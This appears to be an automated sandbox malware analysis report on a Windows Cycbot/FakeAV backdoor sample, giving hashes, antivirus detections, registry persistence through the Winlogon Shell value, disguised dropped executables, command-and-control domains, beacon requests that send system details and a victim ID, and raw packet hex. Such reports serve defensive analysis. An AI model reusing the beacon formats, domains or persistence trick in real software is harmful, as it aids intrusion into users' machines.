Analysis Date: 2014-06-15 05:12:42
MD5: 7af9a5ea1a5cd8ef20a6302d37256c44
SHA1: 35aac20e77150d967686a090db1247f42db97fe0

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text md5: 45de3ccdb7f68a07bf3c8760e72155e9 sha1: d70daa7844c1770ff97303ede97a72c4b188665e size: 65536
Section .rdata md5: 61586231efe18ff8b309f6250f80da75 sha1: a1c74253f4a2fbac43a0f8b8eba87b1401805b4f size: 2048
Section .data md5: e27166ba3a0124b1acf488bd3365a455 sha1: 41b37d3a7f856fcfa1bf89d1c4843a5cac473dba size: 47616
Section .rsrc md5: 73828cdd6196c6d41c034a759186e68b sha1: da4b9df52069578ad0459fa1a9ecf8bc45e6ec0f size: 1024
Timestamp: 2005-10-17 12:28:44
Version:
LegalCopyright: Copyright (C) 2010
ProductVersion: 1, 0, 0, 2
PrivateBuild: 1130
FileVersion: 1, 0, 0, 2
FileDescription: MS Shell
PEhash: 4c2841640de7c3ff074bfc4ff59288fb734c8bb6
IMPhash: aa5309cda6ec83be6de02dfe4c511cad
AV 360 Safe: Gen:Heur.Conjar.9
AV Ad-Aware: Gen:Heur.Conjar.9
AV Alwil (avast): MalOb-IJ [Cryp]
AV Arcabit (arcavir): Downloader.Fraudload.Xzdf
AV Authentium: W32/Goolbot.A.gen!Eldorado
AV Avira (antivir): TR/Crypt.XPACK.Gen
AV CA (E-Trust Ino): Win32/FakeAV.S!generic
AV CAT (quickheal): Backdoor.Cycbot.B
AV ClamAV: Trojan.Downloader-100611
AV Dr. Web: Trojan.Siggen2.7329
AV Emsisoft: Gen:Heur.Conjar.9
AV Eset (nod32): Win32/Kryptik.HVW
AV Fortinet: W32/FakeAV.BZD!tr
AV Frisk (f-prot): W32/Goolbot.A.gen!Eldorado (generic, not disinfectable)
AV F-Secure: Gen:Heur.Conjar.9
AV Grisoft (avg): Cryptic.BFI
AV Ikarus: Trojan.Win32.FakeAV
AV Kaspersky: Trojan-Downloader.Win32.FraudLoad.xzdf
AV MalwareBytes: Backdoor.Gbot
AV Mcafee: BackDoor-EXI.gen.d
AV Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV MicroWorld (escan): Gen:Heur.Conjar.9
AV Norman: winpe/Suspicious_Gen2.EVANU
AV Rising: no_virus
AV Sophos: Troj/Bckdr-REM
AV Symantec: Trojan.FakeAV!gen39
AV Trend Micro: BKDR_CYBOT.SMA
AV VirusBlokAda (vba32): TrojanDownloader.FraudLoad

Runtime Details:

Process
↳ C:\malware.exe

Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell ➝ explorer.exe,C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\Windows\shell.exe
Creates File: PIPE\lsarpc
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Application Data\Microsoft\stor.cfg
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {C66E79CE-8935-4ed9-A6B1-4983619CB925}
Creates Mutex: {655A89EF-C8EC-4587-9504-3DB66A15085F}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
Creates Mutex: {35BCA615-C82A-4152-8857-BCC626AE4C8D}
Winsock DNS: www.google.com
Winsock DNS: 127.0.0.1
Winsock DNS: www.8minutedating.com
Winsock DNS: checkserverstatux.com
Winsock DNS: whysohardx.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe%C:\Documents and Settings\Administrator\Local Settings\Temp

Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\dwm.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\Microsoft\svchost.exe

Network Details:

DNS: www.8minutedating.com
Type: A
69.9.181.104
DNS: www.google.com
Type: A
64.233.171.104
DNS: www.google.com
Type: A
64.233.171.105
DNS: www.google.com
Type: A
64.233.171.106
DNS: www.google.com
Type: A
64.233.171.147
DNS: www.google.com
Type: A
64.233.171.99
DNS: www.google.com
Type: A
64.233.171.103
DNS: protectyourpc-11.com
Type: A
69.43.161.170
DNS: whysohardx.com
Type: A
DNS: checkserverstatux.com
Type: A
HTTP GET: http://www.8minutedating.com/images/attend_for_free/attend35.jpg?tq=gHZutDyMv5rJejDia9nrmsl6giWz%2BJZbVyA%3D
User-Agent: gbot/2.3
HTTP GET: http://www.google.com/
User-Agent:
HTTP GET: http://www.google.com/
User-Agent:
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=main&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err084&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POST: http://protectyourpc-11.com/cgi-bin/cycle_report.cgi?type=g_v42&system=6.0.2900|5.1.2600|1033&id=C059900AFF044FFC75DE&status=err095_2_6&n=0&extra=0
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 69.9.181.104:80
Flows TCP: 192.168.1.1:1032 ➝ 64.233.171.104:80
Flows TCP: 192.168.1.1:1033 ➝ 64.233.171.104:80
Flows TCP: 192.168.1.1:1034 ➝ 69.43.161.170:80
Flows TCP: 192.168.1.1:1035 ➝ 69.43.161.170:80
Flows TCP: 192.168.1.1:1036 ➝ 69.43.161.170:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 61747465   GET /images/atte
0x00000010 (00016)   6e645f66 6f725f66 7265652f 61747465   nd_for_free/atte
0x00000020 (00032)   6e643335 2e6a7067 3f74713d 67485a75   nd35.jpg?tq=gHZu
0x00000030 (00048)   7444794d 7635724a 656a4469 61396e72   tDyMv5rJejDia9nr
0x00000040 (00064)   6d736c36 6769577a 2532424a 5a625679   msl6giWz%2BJZbVy
0x00000050 (00080)   41253344 20485454 502f312e 300d0a43   A%3D HTTP/1.0..C
0x00000060 (00096)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000070 (00112)   0d0a486f 73743a20 7777772e 386d696e   ..Host: www.8min
0x00000080 (00128)   75746564 6174696e 672e636f 6d0d0a41   utedating.com..A
0x00000090 (00144)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000a0 (00160)   2d416765 6e743a20 67626f74 2f322e33   -Agent: gbot/2.3
0x000000b0 (00176)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 2532424a 5a625679    */*....%2BJZbVy
0x00000050 (00080)   41253344 20485454 502f312e 300d0a43   A%3D HTTP/1.0..C
0x00000060 (00096)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000070 (00112)   0d0a486f 73743a20 7777772e 386d696e   ..Host: www.8min
0x00000080 (00128)   75746564 6174696e 672e636f 6d0d0a41   utedating.com..A
0x00000090 (00144)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000a0 (00160)   2d416765 6e743a20 67626f74 2f322e33   -Agent: gbot/2.3
0x000000b0 (00176)   0d0a0d0a                              ....

0x00000000 (00000)   47455420 2f204854 54502f31 2e300d0a   GET / HTTP/1.0..
0x00000010 (00016)   436f6e6e 65637469 6f6e3a20 636c6f73   Connection: clos
0x00000020 (00032)   650d0a48 6f73743a 20777777 2e676f6f   e..Host: www.goo
0x00000030 (00048)   676c652e 636f6d0d 0a416363 6570743a   gle.com..Accept:
0x00000040 (00064)   202a2f2a 0d0a0d0a 2532424a 5a625679    */*....%2BJZbVy
0x00000050 (00080)   41253344 20485454 502f312e 300d0a43   A%3D HTTP/1.0..C
0x00000060 (00096)   6f6e6e65 6374696f 6e3a2063 6c6f7365   onnection: close
0x00000070 (00112)   0d0a486f 73743a20 7777772e 386d696e   ..Host: www.8min
0x00000080 (00128)   75746564 6174696e 672e636f 6d0d0a41   utedating.com..A
0x00000090 (00144)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x000000a0 (00160)   2d416765 6e743a20 67626f74 2f322e33   -Agent: gbot/2.3
0x000000b0 (00176)   0d0a0d0a                              ....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 32267379 7374656d   ype=g_v42&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d6d 61696e26 6e3d3026   status=main&n=0&
0x00000070 (00112)   65787472 613d3020 48545450 2f312e31   extra=0 HTTP/1.1
0x00000080 (00128)   0d0a486f 73743a20 70726f74 65637479   ..Host: protecty
0x00000090 (00144)   6f757270 632d3131 2e636f6d 0d0a5573   ourpc-11.com..Us
0x000000a0 (00160)   65722d41 67656e74 3a204d6f 7a696c6c   er-Agent: Mozill
0x000000b0 (00176)   612f342e 30202863 6f6d7061 7469626c   a/4.0 (compatibl
0x000000c0 (00192)   653b204d 53494520 362e303b 2057696e   e; MSIE 6.0; Win
0x000000d0 (00208)   646f7773 204e5420 352e3129 0d0a436f   dows NT 5.1)..Co
0x000000e0 (00224)   6e74656e 742d4c65 6e677468 3a20300d   ntent-Length: 0.
0x000000f0 (00240)   0a436f6e 6e656374 696f6e3a 20636c6f   .Connection: clo
0x00000100 (00256)   73650d0a 0d0a                         se....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 32267379 7374656d   ype=g_v42&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723038 34266e3d   status=err084&n=
0x00000070 (00112)   30266578 7472613d 30204854 54502f31   0&extra=0 HTTP/1
0x00000080 (00128)   2e310d0a 486f7374 3a207072 6f746563   .1..Host: protec
0x00000090 (00144)   74796f75 7270632d 31312e63 6f6d0d0a   tyourpc-11.com..
0x000000a0 (00160)   55736572 2d416765 6e743a20 4d6f7a69   User-Agent: Mozi
0x000000b0 (00176)   6c6c612f 342e3020 28636f6d 70617469   lla/4.0 (compati
0x000000c0 (00192)   626c653b 204d5349 4520362e 303b2057   ble; MSIE 6.0; W
0x000000d0 (00208)   696e646f 7773204e 5420352e 31290d0a   indows NT 5.1)..
0x000000e0 (00224)   436f6e74 656e742d 4c656e67 74683a20   Content-Length: 
0x000000f0 (00240)   300d0a43 6f6e6e65 6374696f 6e3a2063   0..Connection: c
0x00000100 (00256)   6c6f7365 0d0a0d0a                     lose....

0x00000000 (00000)   504f5354 202f6367 692d6269 6e2f6379   POST /cgi-bin/cy
0x00000010 (00016)   636c655f 7265706f 72742e63 67693f74   cle_report.cgi?t
0x00000020 (00032)   7970653d 675f7634 32267379 7374656d   ype=g_v42&system
0x00000030 (00048)   3d362e30 2e323930 307c352e 312e3236   =6.0.2900|5.1.26
0x00000040 (00064)   30307c31 30333326 69643d43 30353939   00|1033&id=C0599
0x00000050 (00080)   30304146 46303434 46464337 35444526   00AFF044FFC75DE&
0x00000060 (00096)   73746174 75733d65 72723039 355f325f   status=err095_2_
0x00000070 (00112)   36266e3d 30266578 7472613d 30204854   6&n=0&extra=0 HT
0x00000080 (00128)   54502f31 2e310d0a 486f7374 3a207072   TP/1.1..Host: pr
0x00000090 (00144)   6f746563 74796f75 7270632d 31312e63   otectyourpc-11.c
0x000000a0 (00160)   6f6d0d0a 55736572 2d416765 6e743a20   om..User-Agent: 
0x000000b0 (00176)   4d6f7a69 6c6c612f 342e3020 28636f6d   Mozilla/4.0 (com
0x000000c0 (00192)   70617469 626c653b 204d5349 4520362e   patible; MSIE 6.
0x000000d0 (00208)   303b2057 696e646f 7773204e 5420352e   0; Windows NT 5.
0x000000e0 (00224)   31290d0a 436f6e74 656e742d 4c656e67   1)..Content-Leng
0x000000f0 (00240)   74683a20 300d0a43 6f6e6e65 6374696f   th: 0..Connectio
0x00000100 (00256)   6e3a2063 6c6f7365 0d0a0d0a 73207365   n: close....s se
0x00000110 (00272)   72766572 20636f75 6c64206e 6f742075   rver could not u
0x00000120 (00288)   6e646572 7374616e 642e3c2f 703e0a20   nderstand.</p>. 
0x00000130 (00304)   2020203c 703e4e6f 20737563 68206669      <p>No such fi
0x00000140 (00320)   6c65206f 72206469 72656374 6f72792e   le or directory.
0x00000150 (00336)   3c2f703e 0a20203c 6872202f 3e0a2020   </p>.  <hr />.  
0x00000160 (00352)   3c616464 72657373 3e4d6963 726f736f   <address>Microso
0x00000170 (00368)   66742d49 49532f37 2e303c2f 61646472   ft-IIS/7.0</addr
0x00000180 (00384)   6573733e 0a20203c 2f626f64 793e0a3c   ess>.  </body>.<
0x00000190 (00400)   2f68746d 6c3e0a                       /html>.
Strings
.
.
h.
..
K...
040904b0
1, 0, 0, 2
1130
Copyright (C) 2010
FileDescription
FileVersion
LegalCopyright
&Main
MS Sans Serif
MS Shell
PrivateBuild
ProductVersion
S&top
StringFileInfo
Translation
VarFileInfo
VS_VERSION_INFO
:[1|00
=18\qwX
3rg-^!
`4EIM_J"{
4QfW.	
5{[DVb
5P9A2[
=(;6tS0
#6t.va
6%y5-+
7"4^aTz
7	X; vI
 ';8/`
'8N{sj
8q37X)1~
|8W2 LI#
9'k2l2~BJ
9P/(("8
_9SdXM=
;a51*b
aKpR56
apkV96
B}{`=J
c{eG;B
C]G2 j
CloseHandle
CreateDirectoryW
CreateFileW
CRYPT32.dll
CryptEncodeObject
CryptEncodeObjectEx
CryptEnumOIDInfo
<"-d4`(
@.data
DDRAW.dll
DecodePointer
DeleteFileW
dh[,	%
DirectDrawCreateClipper
<DQ7X]
...\DW
d]	yFk
EnumUILanguagesW
eP-k<y
'[eTuhA
#eULVc
ExitProcess
ExpandEnvironmentStringsW
/F54k,
!FDT^Sx
f=f8Jn
FH{Xz+
"F]IGC
"]F}'n
fn.X)7
FreeLibrary
GcCBbX
{ GC=qqlhd
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetModuleFileNameW
GetModuleHandleA
GetModuleHandleW
GetProcAddress
GetProcessVersion
GetSystemTimeAsFileTime
GetTickCount
GetVersionExA
G)n@1N
($gr~q!
gR,uMS
H"_0-z
hC$RCC%
"hL/RY
Hq=z.&
{huak^)l
h	!X[V
hy)aKE
{hYhUF@
I ;7'Wh
]iC0s;
IIVPJ)"
InterlockedCompareExchange
InterlockedExchange
_ioXU-&
iSk+DU
;>Ix)K|
-`j1"N
jD[mU&
jh+D1(
,"jJGD
jmyE7`
j|NH8W
]JnY5X
JQ{|kc
k_1Z	-P
/KBVA&$p-5
KERNEL32.dll
KI3*zu
k`~qXZm
krT SG
Ldlhk5
(lf*?iO@
L=i>iS
LoadLibraryExW
LoadLibraryW
LocalAlloc
LocalFree
l{?RsC
lstrcmpW
lstrlenW
Lyo@o TO
.L<ZUAL
m /6X.
m$&A{X
M(h~3@
mmJO\i
MoveFileW
MRhXl=
M[r>Ok
];\()n`
)N^Cs>#
'nM[Ixq
N[ML|v
ntdll.dll
n^%Z8}
-{](Oa
OpenEventW
op*O6;
:ORJ^&
PathFileExistsW
PathFindFileNameW
P)H{hV
PPPa6Iz
PPPFP)
}p.QKb
P ;XwX
 pZ ~	B
q/5/*B""HE
qgV'o8
];\Q-p
q`{PS%
qRYE0I2X
QueryPerformanceCounter
`.rdata
RtlUnwind
RU4hTh
SetConsoleMode
SetUnhandledExceptionFilter
SHELL32.dll
SHGetFolderPathAndSubDirW
SHLWAPI.dll
SHSetLocalizedName
S??pmc?l
StrCmpNW
StrStrW
SZ/4iM
T+7xOd
TerminateProcess
!This program cannot be run in DOS mode.
ThlFre
ThLibrhWX@
ThLoad
Throte
ThualPh
:TM 83
%Tp=mTG
^^^U?a
>U/&ax
u$h{f@
U=>-N	
UnhandledExceptionFilter
vLA:x*
Vo@V{G
[)vV%*
?.w$?1
w&]21$
WaitForSingleObject
wC3J	~
W&F'Q*5
+wK~ `zb
W[)L^1"
w/L]!.=d
WntRU92
W@>Q>*
WriteFile
W}Y4Z#
X1mP)KIg
-!.x}	3L
x3zUh?d
y2Ybdi
Ymq$%]
]yQ^MP
Yu^olwe
:-Z7+P/b_
z	$	%J
;Z~@RMI